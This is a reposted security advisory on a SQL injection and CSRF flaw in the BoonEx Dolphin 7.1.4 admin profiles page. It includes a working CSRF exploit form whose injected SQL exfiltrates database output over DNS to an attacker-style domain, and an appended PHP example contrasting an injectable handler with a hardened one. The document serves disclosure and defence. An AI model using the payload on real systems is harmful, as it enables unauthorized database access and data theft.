SQL Injection in Dolphin

Board: Bugtraq. Posted 2014/06/18 21:01 (edited). 0 comments, 0 participants; thread 2/2.
Advisory ID: HTB23216
Product: Dolphin
Vendor: BoonEx
Vulnerable Version(s): 7.1.4 and probably prior
Tested Version: 7.1.4
Advisory Publication: May 21, 2014 [without technical details]
Vendor Notification: May 21, 2014
Vendor Patch: June 17, 2014
Public Disclosure: June 18, 2014
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-3810
Risk Level: Medium
CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Solution Available
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered an SQL injection vulnerability in Dolphin, which can be exploited to perform SQL injection attacks and obtain sensitive information from the application database.

1) SQL Injection in Dolphin: CVE-2014-3810

The vulnerability exists due to insufficient sanitization of the "members" HTTP POST parameter passed to the "/administration/profiles.php" script. A remote authenticated administrator can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary SQL commands in the application's database.

This vulnerability could also be exploited by a remote non-authenticated attacker via a CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so, an attacker would have to trick a logged-in administrator into visiting a web page containing the CSRF exploit.

The CSRF exploit code below is based on the DNS exfiltration technique and applies when the database of the vulnerable application is hosted on a Windows system. The exploit makes the database server issue a DNS request for the IP address of a `version()` subdomain (or any other sensitive output from the database) of ".attacker.com" (a domain whose DNS server is controlled by the attacker):

<form action="http://[host]/administration/profiles.php" method="post" name="main">
<input type="hidden" name="adm-mp-members-ctl-type" value="qlinks">
<input type="hidden" name="adm-mp-members-view-type" value="simple">
<input type="hidden" name="order_by" value="">
<input type="hidden" name="per_page" value="50">
<input type="hidden" name="members[]" value="') AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- ">
<input type="hidden" name="adm-mp-activate" value="Activate">
<input type="submit" id="btn">
</form>

-----------------------------------------------------------------------------------------------

Solution:

Apply vendor's instructions:
http://www.boonex.com/forums/topic/Medium-Risk-Security-Vulnerability-in-Dolphin-7-1.htm

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23216 - https://www.htbridge.com/advisory/HTB23216 - SQL Injection in Dolphin.
[2] Dolphin - http://www.boonex.com/dolphin - The world's most advanced software platform for building vibrant custom social networks and online communities.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
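The advisory names two defects that combine here: a `members[]` array joined into an SQL IN list without sanitization, and an admin form with no CSRF protection. The following is an added illustration, not code from the advisory, from Dolphin or from BoonEx, of a hypothetical admin "activate members" handler written both ways. The table `Profiles`, the columns `ID` and `Status`, the `csrf_token` field and the function names are assumptions for the example; only the request field names `members[]` and `adm-mp-activate` come from the advisory's form.

```php
<?php
// Added illustration (not Dolphin's code): an admin bulk action that receives a
// members[] array, built so that neither defect in the advisory applies.
// Table/column names and the CSRF token layout are assumptions for the example.

declare(strict_types=1);

// --- Vulnerable shape: the array is joined straight into the SQL text. ---
// An element such as "') AND 1=(select ...) -- " closes the quoted list and
// appends attacker-controlled SQL. This is the CWE-89 pattern the advisory describes.
function activateMembersUnsafe(PDO $db, array $members): int
{
    $list = "('" . implode("','", $members) . "')";   // no escaping, no type check
    return $db->exec("UPDATE Profiles SET Status = 'Active' WHERE ID IN $list");
}

// --- Hardened shape ---
// 1. Refuse the request unless it carries the per-session CSRF token, so a page
//    the administrator is lured onto cannot submit the form on their behalf.
function assertCsrfToken(array $post, array $session): void
{
    $sent     = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    // hash_equals() compares in constant time; an empty or missing token fails closed.
    if ($expected === '' || !is_string($sent) || !hash_equals($expected, $sent)) {
        http_response_code(403);
        throw new RuntimeException('CSRF token missing or invalid');
    }
}

// 2. Member IDs are integers: validate each element strictly and drop anything
//    else before it gets anywhere near the query.
function sanitizeMemberIds(array $members): array
{
    $ids = [];
    foreach ($members as $m) {
        $id = filter_var($m, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($id !== false) {
            $ids[] = $id;
        }
    }
    return array_values(array_unique($ids));
}

// 3. Bind every ID as a parameter. The IN list gets one "?" per value, so user
//    input never becomes part of the SQL text.
function activateMembersSafe(PDO $db, array $members): int
{
    $ids = sanitizeMemberIds($members);
    if ($ids === []) {
        return 0;
    }
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare("UPDATE Profiles SET Status = 'Active' WHERE ID IN ($placeholders)");
    foreach ($ids as $i => $id) {
        $stmt->bindValue($i + 1, $id, PDO::PARAM_INT);   // positional parameters are 1-based
    }
    $stmt->execute();
    return $stmt->rowCount();
}

// Request handling for the hypothetical admin action.
function handleActivateRequest(PDO $db, array $post, array $session): int
{
    if (($post['adm-mp-activate'] ?? '') !== 'Activate') {
        return 0;
    }
    assertCsrfToken($post, $session);
    $members = $post['members'] ?? [];
    if (!is_array($members)) {
        return 0;
    }
    return activateMembersSafe($db, $members);
}

// Smoke run with constructed input against an in-memory SQLite database.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec("CREATE TABLE Profiles (ID INTEGER PRIMARY KEY, Status TEXT)");
$db->exec("INSERT INTO Profiles VALUES (1,'Pending'),(2,'Pending'),(3,'Pending')");

$session = ['csrf_token' => bin2hex(random_bytes(16))];   // constructed session state
$post = [
    'adm-mp-activate' => 'Activate',
    'csrf_token'      => $session['csrf_token'],
    // constructed: two valid IDs plus an element shaped like the advisory's payload
    'members'         => ['1', '3', "') AND 1=(select load_file('x')) -- "],
];
echo handleActivateRequest($db, $post, $session), " rows activated\n";
```

In the smoke run the third `members[]` element fails integer validation and is simply dropped, and the remaining IDs reach the database only as bound parameters. When the backing store is MySQL, as in Dolphin's case, also set `PDO::ATTR_EMULATE_PREPARES` to `false` so the placeholders are handled server-side rather than interpolated by the driver.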
Article ID (AID): #1JeOsEFf (Bugtraq)